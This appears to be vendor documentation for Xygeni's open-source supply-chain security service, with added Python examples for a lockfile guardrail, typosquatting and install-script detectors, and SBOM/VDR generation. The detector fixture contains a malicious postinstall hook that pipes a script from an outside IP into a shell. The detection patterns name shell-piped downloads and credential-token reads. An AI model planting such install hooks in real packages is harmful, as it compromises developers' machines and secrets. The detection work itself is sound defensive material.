
Open Source (SCA)


Last updated 23 days ago

OSS Overview

Open Source Security continuously monitors your dependencies so that threats are detected and mitigated before they reach your software.

Recent industry reports show that nearly three-quarters of codebases contain high-risk open-source components: the share of codebases with high-risk vulnerabilities rose from 48% to 74% in a single year. Even more concerning, 91% of the components found were at least ten versions behind the current release, which widens the window of exposure considerably. Malicious open-source packages are also growing fast, with year-over-year growth rates above 300% and more than 245,000 malicious packages detected in 2023. It is time to take action against these threats.

Given these challenges, Xygeni’s Open Source Security solution scans newly published packages and blocks harmful ones at publication time, dramatically reducing the risk of malware and vulnerable code infiltrating your systems. This monitoring spans multiple public registries, so every dependency is scrutinized for safety and integrity. Xygeni also helps your team keep projects secure and reliable by prioritizing critical issues in context and streamlining remediation.

Xygeni Open Source Security is designed to protect against both vulnerabilities and malicious code, keeping your applications secure and resilient. Its capabilities give you visibility and control over your open-source components so that risk can be managed effectively:

  1. Comprehensive Component Identification: every open-source component in your software projects is identified and catalogued.

  2. Continuous Scanning and Vulnerability Management: every component, whether direct, transitive, or undeclared, is assessed for security vulnerabilities, maintenance issues, and licensing compliance.

  3. Context-Aware Prioritization: issues are ranked by severity, exploitability, and potential business impact, so that security and development teams focus on the most critical ones first.

  4. Security Beyond CVEs: risk factors other than CVSS scores are taken into account, so that packages that are CVE-free but still risky are kept out of your builds.

  5. License Risk Management: instant visibility into open-source license issues helps your team avoid legal complications and meet regulatory requirements.

  6. One-click SBOM and VDR generation in SPDX or CycloneDX format keeps your software components transparent and compliant with regulatory requirements.

Comprehensive Component Identification

At the heart of Xygeni’s Open Source Security is our advanced capability to precisely identify and catalog every open-source component in your software projects. This thorough approach provides complete visibility into your software’s architecture, enabling a detailed assessment of your project’s security posture and compliance status. Your team can make better decisions by understanding exactly what makes up your software.

Strategic Approach for Risk Prioritization with ASPM

Xygeni’s platform identifies and prioritizes the vulnerabilities that pose the greatest risk to your software projects. By systematically analyzing the severity and potential impact of each vulnerability, Xygeni lets organizations focus their resources on mitigating the most critical issues first. Prioritization is driven by a combination of factors: vulnerability severity, exploitability, exposure, potential impact on business operations, and any custom property defined by the customer. Key features of Xygeni’s prioritization process are:

  1. Contextual Assessment: each vulnerability is assessed on its severity and on the context of the affected component, so vulnerabilities are not evaluated in isolation but within the broader scope of the system’s architecture.

  2. Context-Aware Prioritization: not all vulnerabilities are created equal, so Xygeni ranks issues by their operational and strategic impact. Vulnerabilities that could lead to a significant breach are flagged and addressed first.

  3. Customizable Risk Metrics: organizations can customize how risks are scored and prioritized, aligning the process with their own security policies and compliance requirements. This keeps security efforts in sync with organizational priorities and risk

Malware Early Detection, Blocking, and Notification

As soon as a new package version is published, Xygeni scans it in near real time and blocks malware based on code behavior analysis, avoiding extensive and urgent post-build remediation. The process works as follows:

Continuous Scanning:

  • Public Registries Monitored: the service continuously scans multiple public registries such as npm, Maven Central, and PyPI.

  • Immediate Notification to Affected Users: As soon as a potential threat is detected, the system immediately notifies the affected users, enabling rapid response to mitigate risks. Notifications can be raised through standard Xygeni mechanisms such as email, messaging platforms, and webhooks.

Quarantine:

  • Automatic Blocking of Zero-Day Malware: Upon detection, suspicious packages are automatically quarantined. The customer can use this information to implement guardrails in their CI/CD to prevent the packages from entering the development environment or the broader software supply chain.

Review and Confirmation:

  • Code Review by Security Researchers: A security research team reviews the quarantined package to verify the threat.

  • Confirmation by Public Registry: once our internal team confirms the threat, we report it to the public registry, which validates the finding, the threat level, and the nature of the malware or vulnerability.

Disposal and Public Disclosure:

  • Disposal: Once a threat is confirmed, the appropriate measures are taken to dispose of the threat safely, ensuring it does not re-enter the ecosystem.

  • Public Disclosure: The usual details about the malware and its disposal are publicly disclosed through the product, Xygeni blog, or the package registry to inform the wider community and prevent
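The quarantine step above leaves the enforcement to the customer: the quarantine information has to be turned into a CI/CD guardrail that rejects a build whose resolved dependencies include a flagged version. The following is an added example, not Xygeni’s own code or feed format: it reads an npm package-lock.json (lockfileVersion 2 or 3), compares every resolved package against a quarantine feed, and additionally rejects tarballs fetched from any host other than the approved registry. The feed layout, the lockfile and all package names are constructed for the example; a real early-warning service publishes its own feed.

```python
"""Added example, not Xygeni's own code: a CI guardrail that reads an npm
package-lock.json (lockfileVersion 2/3) and fails the build when a resolved
package is listed in a quarantine feed or was fetched from a host other than
the approved registry. The feed format and all data are constructed for the
example; a real early-warning service would publish its own feed."""
import json
from urllib.parse import urlparse

# Constructed quarantine feed (hypothetical format): packages an early-warning
# service has flagged as malicious, pending registry confirmation.
QUARANTINE_FEED = [
    {"ecosystem": "npm", "name": "acme-logger", "version": "2.1.0"},
    {"ecosystem": "npm", "name": "fast-json-patchx", "version": "1.0.3"},
]

# Only tarballs from these hosts are allowed into the build.
ALLOWED_REGISTRY_HOSTS = {"registry.npmjs.org"}

# Constructed lockfile: one quarantined version, one tarball from an untrusted host.
SAMPLE_LOCKFILE = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0",
             "dependencies": {"acme-logger": "^2.0.0", "left-pad": "1.3.0"}},
        "node_modules/left-pad": {
            "version": "1.3.0",
            "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz"},
        "node_modules/acme-logger": {
            "version": "2.1.0",
            "resolved": "https://registry.npmjs.org/acme-logger/-/acme-logger-2.1.0.tgz"},
        "node_modules/acme-logger/node_modules/@acme/telemetry": {
            "version": "0.9.1",
            "resolved": "http://198.51.100.7/pkgs/telemetry-0.9.1.tgz"},
    },
})

# Constructed lockfile with nothing to report, for comparison.
CLEAN_LOCKFILE = json.dumps({
    "name": "demo-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "version": "1.0.0"},
        "node_modules/left-pad": {
            "version": "1.3.0",
            "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz"},
    },
})


def package_name_from_path(path):
    """'node_modules/a/node_modules/@s/b' -> '@s/b' (handles nested and scoped packages)."""
    return path.rsplit("node_modules/", 1)[-1]


def iter_lock_packages(lock):
    """Yield (name, version, resolved) for every installed package in the lockfile."""
    for path, entry in lock.get("packages", {}).items():
        if path == "":  # the root project itself, not a dependency
            continue
        yield package_name_from_path(path), entry.get("version"), entry.get("resolved", "")


def evaluate_lockfile(lock_json, feed=QUARANTINE_FEED, allowed_hosts=ALLOWED_REGISTRY_HOSTS):
    """Return the list of findings; an empty list means the guardrail passes."""
    quarantined = {(e["name"], e["version"]) for e in feed if e["ecosystem"] == "npm"}
    findings = []
    for name, version, resolved in iter_lock_packages(json.loads(lock_json)):
        if (name, version) in quarantined:
            findings.append({"kind": "quarantined", "package": name, "version": version,
                             "detail": "version is in the malware quarantine feed"})
        host = urlparse(resolved).hostname if resolved else None
        if host and host not in allowed_hosts:
            findings.append({"kind": "untrusted-source", "package": name, "version": version,
                             "detail": f"tarball resolved from {host}"})
    return findings


def guardrail_passes(lock_json, feed=QUARANTINE_FEED, allowed_hosts=ALLOWED_REGISTRY_HOSTS):
    return not evaluate_lockfile(lock_json, feed, allowed_hosts)


if __name__ == "__main__":
    for f in evaluate_lockfile(SAMPLE_LOCKFILE):
        print(f"{f['kind']:17} {f['package']}@{f['version']}: {f['detail']}")
    # Non-zero exit makes the CI step fail and keeps the package out of the build.
    raise SystemExit(0 if guardrail_passes(SAMPLE_LOCKFILE) else 1)
```

Checking the lockfile rather than package.json matters because the lockfile records the versions and tarball URLs that will actually be installed, including transitive ones; the untrusted-host check catches a dependency that was redirected to an attacker-controlled mirror even when its name and version look legitimate.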

Simplify Open Source Licensing

Xygeni makes navigating the complexities of open-source licensing easy. Our scanning capabilities assess each component’s license, helping your team avoid legal issues and ensure compliance with both organizational policies and external regulations. With Xygeni, you can confidently use open-source software, knowing that all licensing requirements are met.

Keep Your Software Updated and Secure

Xygeni actively monitors and identifies outdated or obsolete components in your software projects. By ensuring your projects always utilize the latest and most secure versions, Xygeni not only reduces potential security risks but also boosts software performance and compatibility.

Advanced Detection of Suspect Dependencies

Xygeni’s Suspect Dependencies Scanner identifies and manages dependencies that could be targets for, or vehicles of, supply-chain attacks. By analyzing the dependency graph, it detects issues such as typosquatting, dependency confusion, and suspicious installation scripts that may indicate a compromise. When a component is flagged as suspicious, Xygeni provides mitigation and remediation guidance for safely removing or isolating it, including version pinning, restricting installs to allow-listed components, and blocking suspicious installation scripts.

Optimized and Accelerated Remediation Workflows

Prioritizing vulnerabilities that pose the highest risk ensures that remediation efforts are concentrated where they are most needed, optimizing resource allocation and reducing the time and effort spent on lower-risk vulnerabilities. Moreover, Xygeni simplifies the remediation of open-source vulnerabilities by integrating directly into developers’ existing workflows and issue-tracking systems. This seamless integration provides all the necessary context for each vulnerability right within the tools developers already use, facilitating efficient and effective remediation.

Enhance Transparency and Compliance with SBOM and VDR Generation

Xygeni Open Source Security gives organizations complete transparency over their software components through SBOM generation. An SBOM provides a detailed inventory of all software dependencies, which supports regulatory compliance and strengthens supply-chain security. In addition, the Vulnerability Disclosure Report (VDR) generation capability keeps all stakeholders informed of known vulnerabilities in those components, enabling proactive risk management and reinforcing trust throughout the development lifecycle.

Effective Vulnerability Management

Xygeni enhances your software’s security by continuously scanning and analyzing open-source components for vulnerabilities. It draws on the National Vulnerability Database (NVD), ecosystem-specific vulnerability databases and security advisories, and Common Vulnerabilities and Exposures (CVE) identifiers to detect known security issues quickly and accurately, so that your applications can be protected promptly.

Overview of Supported Package Managers

Xygeni provides detectors tailored to the characteristics of each supported package manager, ensuring broad coverage and precise resolution of dependencies.

Types of Suspect Dependency Detector

  • Anomalous Dependencies: Identifies unusual or unexpected dependencies within the context of the project, which may signal a security concern.

  • Dependency Confusion: This feature detects cases where internal package names may be confused with similarly named packages from public repositories, potentially leading to security breaches.

  • Known Vulnerabilities: Flags dependencies that contain recognized security vulnerabilities.

  • Malware: Looks for dependencies known to contain malware, providing critical security alerts to prevent potential harm.

  • Suspicious Scripts: Monitors for scripts within dependencies that might perform unauthorized or harmful actions.

  • Typosquatting: Aims to catch potentially malicious typosquatting attempts where package names are slightly altered to trick users into installing them.

  • Unscoped Internal Components: an npm-specific detector that identifies internal components published without an organization scope, which are therefore at risk of being exposed publicly or confused with external packages of the same name.

To deliver these capabilities, Xygeni provides a Scanner (to resolve dependencies and find security issues) and a Web UI to review the results.
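To make the detector categories above concrete, here is an added example, not Xygeni’s own code, of how three of them (typosquatting, dependency confusion through an unscoped internal name, and suspicious lifecycle scripts) can be implemented over npm manifests. The reference data (a set of popular package names, the organization’s internal package names and scope) and the manifests are constructed for the example; a real scanner would use registry popularity data and the organization’s package inventory, and would run over every package.json installed under node_modules, as the example does for one dependency.

```python
"""Added example, not Xygeni's own code: three suspect-dependency detectors over
npm manifests (typosquatting, dependency confusion via unscoped internal names,
and suspicious lifecycle scripts). Reference data and manifests are constructed
for the example; a real scanner uses registry popularity data and the
organisation's own package inventory instead."""
import json
import re

# Constructed reference data (hypothetical): public package names an attacker
# would imitate, and the organisation's internal package names and npm scope.
POPULAR_PACKAGES = {"lodash", "express", "react", "axios", "chalk", "cross-env"}
INTERNAL_PACKAGES = {"acme-auth", "acme-billing"}
INTERNAL_SCOPE = "@acme"

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
SUSPICIOUS_SCRIPT_PATTERNS = (
    (r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", "pipes a downloaded script into a shell"),
    (r"\bbase64\b", "decodes a base64 payload at install time"),
    (r"\beval\b|\bnode\s+-e\b", "evaluates code from a string"),
    (r"\b(npm_config_|NPM_TOKEN|AWS_SECRET|GITHUB_TOKEN)", "reads credential environment variables"),
)

# Constructed manifests: the application plus one installed dependency.
SAMPLE_TREE = {
    "package.json": json.dumps({
        "name": "demo-app",
        "dependencies": {"lodahs": "^4.17.21", "express": "^4.18.2",
                         "acme-auth": "^1.2.0", "@acme/billing": "^3.0.0", "crossenv": "5.2.0"},
        "devDependencies": {"chalk": "^5.3.0"},
        "scripts": {"test": "jest"},
    }),
    "node_modules/crossenv/package.json": json.dumps({
        "name": "crossenv", "version": "5.2.0",
        "scripts": {"postinstall": "curl -s http://198.51.100.7/i.sh | sh"},
    }),
}


def osa_distance(a, b):
    """Optimal string alignment distance: edits plus adjacent transpositions,
    so 'lodahs' -> 'lodash' costs 1, the way typosquats usually differ."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def check_typosquat(name):
    """A name one edit away from a popular package, but not that package, is suspect."""
    if name in POPULAR_PACKAGES:
        return None
    bare = name.split("/")[-1]  # compare the unscoped part of scoped names
    for popular in POPULAR_PACKAGES:
        if osa_distance(bare, popular) == 1:
            return f"one edit away from popular package '{popular}'"
    return None


def check_dependency_confusion(name):
    """An internal name referenced without the org scope resolves from the public registry."""
    if name in INTERNAL_PACKAGES and not name.startswith("@"):
        return f"internal package referenced unscoped; expected it under {INTERNAL_SCOPE}/"
    return None


def check_install_scripts(scripts):
    issues = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        for pattern, why in SUSPICIOUS_SCRIPT_PATTERNS:
            if re.search(pattern, cmd):
                issues.append(f"{hook} {why}: {cmd}")
    return issues


def scan_manifest(path, manifest):
    findings = []
    deps = {**manifest.get("dependencies", {}), **manifest.get("devDependencies", {})}
    for name in deps:
        why = check_typosquat(name)
        if why:
            findings.append({"kind": "typosquatting", "package": name, "detail": why, "in": path})
        why = check_dependency_confusion(name)
        if why:
            findings.append({"kind": "dependency-confusion", "package": name, "detail": why, "in": path})
    for why in check_install_scripts(manifest.get("scripts", {})):
        findings.append({"kind": "suspicious-script", "package": manifest.get("name", "?"),
                         "detail": why, "in": path})
    return findings


def scan_tree(manifests):
    """manifests maps each package.json path (app and installed deps) to its JSON text."""
    findings = []
    for path, text in manifests.items():
        findings.extend(scan_manifest(path, json.loads(text)))
    return findings


if __name__ == "__main__":
    for f in scan_tree(SAMPLE_TREE):
        print(f"{f['kind']:21} {f['package']:14} {f['detail']}  ({f['in']})")
```

The install-script detector is the one that catches what the dependency graph alone cannot: `crossenv` looks like an ordinary dependency in the application manifest, and only its own package.json reveals the postinstall hook that downloads and executes remote code.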

SBOM and VDR capabilities

In response to growing cybersecurity threats, regulatory bodies worldwide increasingly mandate the use of a Software Bill of Materials (SBOM). An SBOM gives essential visibility into the components of a software application, which in turn supports vulnerability management and compliance with security standards.
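The vulnerability matching described under Effective Vulnerability Management and the SBOM/VDR output described here fit together in one document: CycloneDX carries the component inventory in `components` and the disclosure report in `vulnerabilities`, each entry pointing at the affected component through its `bom-ref`. The following added example, not Xygeni’s own code or output, matches a constructed component inventory against constructed advisories expressed as introduced/fixed version ranges and emits such a CycloneDX 1.5 JSON document. Advisory identifiers, ranges and descriptions are made up for the example, and the version comparison is deliberately simplified to dotted integers (it ignores pre-release tags and ecosystem-specific ordering rules).

```python
"""Added example, not Xygeni's own code: match components against advisory data
and emit a CycloneDX 1.5 JSON document carrying both the SBOM (components) and
the VDR (vulnerabilities with the components they affect). Advisory IDs, ranges
and components are constructed for the example; version comparison is
simplified to dotted integers and ignores pre-release tags."""
import json
import uuid
from datetime import datetime, timezone

# Constructed advisories in introduced/fixed form ("fixed" is exclusive).
ADVISORIES = [
    {"id": "EXAMPLE-2024-0001", "ecosystem": "npm", "name": "lodash",
     "introduced": "0", "fixed": "4.17.21", "severity": "high", "score": 7.4,
     "description": "Constructed advisory for the example; not a real finding."},
    {"id": "EXAMPLE-2024-0002", "ecosystem": "pypi", "name": "requests",
     "introduced": "2.3.0", "fixed": "2.31.0", "severity": "medium", "score": 6.1,
     "description": "Constructed advisory for the example; not a real finding."},
]

# Constructed inventory, as a dependency analyzer would produce it.
COMPONENTS = [
    {"ecosystem": "npm", "name": "lodash", "version": "4.17.20"},
    {"ecosystem": "npm", "name": "express", "version": "4.18.2"},
    {"ecosystem": "pypi", "name": "requests", "version": "2.31.0"},
    {"ecosystem": "pypi", "name": "urllib3", "version": "2.0.7"},
]


def version_key(version):
    """Dotted numeric version -> tuple for comparison; non-digit parts count as 0 (simplified)."""
    parts = []
    for p in version.split("."):
        digits = "".join(ch for ch in p if ch.isdigit())
        parts.append(int(digits) if digits else 0)
    return tuple(parts)


def is_affected(version, introduced, fixed):
    """True when introduced <= version < fixed (fixed=None means no fix yet)."""
    v = version_key(version)
    if v < version_key(introduced):
        return False
    return fixed is None or v < version_key(fixed)


def to_purl(component):
    """Package URL, used both as the component's bom-ref and as its purl."""
    return f"pkg:{component['ecosystem']}/{component['name']}@{component['version']}"


def build_vdr(components=COMPONENTS, advisories=ADVISORIES):
    bom_components = []
    for c in components:
        purl = to_purl(c)
        bom_components.append({"type": "library", "bom-ref": purl, "name": c["name"],
                               "version": c["version"], "purl": purl})

    vulnerabilities = []
    for adv in advisories:
        affected = [to_purl(c) for c in components
                    if c["ecosystem"] == adv["ecosystem"] and c["name"] == adv["name"]
                    and is_affected(c["version"], adv["introduced"], adv["fixed"])]
        if not affected:
            continue  # the VDR lists only advisories that touch this inventory
        vulnerabilities.append({
            "id": adv["id"],
            "source": {"name": "constructed-example-feed"},
            "ratings": [{"score": adv["score"], "severity": adv["severity"], "method": "CVSSv31"}],
            "description": adv["description"],
            "recommendation": f"Upgrade {adv['name']} to {adv['fixed']} or later",
            "affects": [{"ref": ref} for ref in affected],
        })

    return {
        "bomFormat": "CycloneDX",
        "specVersion": "1.5",
        "serialNumber": f"urn:uuid:{uuid.uuid4()}",
        "version": 1,
        "metadata": {"timestamp": datetime.now(timezone.utc).isoformat(timespec="seconds"),
                     "tools": [{"name": "example-vdr-generator", "version": "0.1"}]},
        "components": bom_components,
        "vulnerabilities": vulnerabilities,
    }


if __name__ == "__main__":
    print(json.dumps(build_vdr(), indent=2))
```

Note that `requests 2.31.0` is not reported even though an advisory exists for the package: the fixed version is the first safe one, so the range check must be strict on the upper bound. Getting that boundary wrong in either direction produces either a false alarm on the patched release or a missed finding on the last vulnerable one.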

Analyzers

Dependencies for each ecosystem are processed by a specific analyzer. The analyzer processes dependency descriptors to extract direct and indirect dependencies, resolve their versions, and gather context information like licensing, provenance and other metadata.

Please visit Supported Package Managers for Dependency Resolution for a full description of supported package managers.

Open Source Security provides detectors tailored to the characteristics of each software ecosystem (Maven, PyPI, npm, NuGet, and others), ensuring broad coverage and precise detection of suspect dependencies. See Open Source Analyzers for the complete list.

See Scan with Xygeni CLI and, more specifically, Dependency Scanner and Suspect Dependencies Scanner for instructions on how to execute an Open Source scan.

See Malware Detection and Malware Early Warning Service for how malicious packages are detected and reported.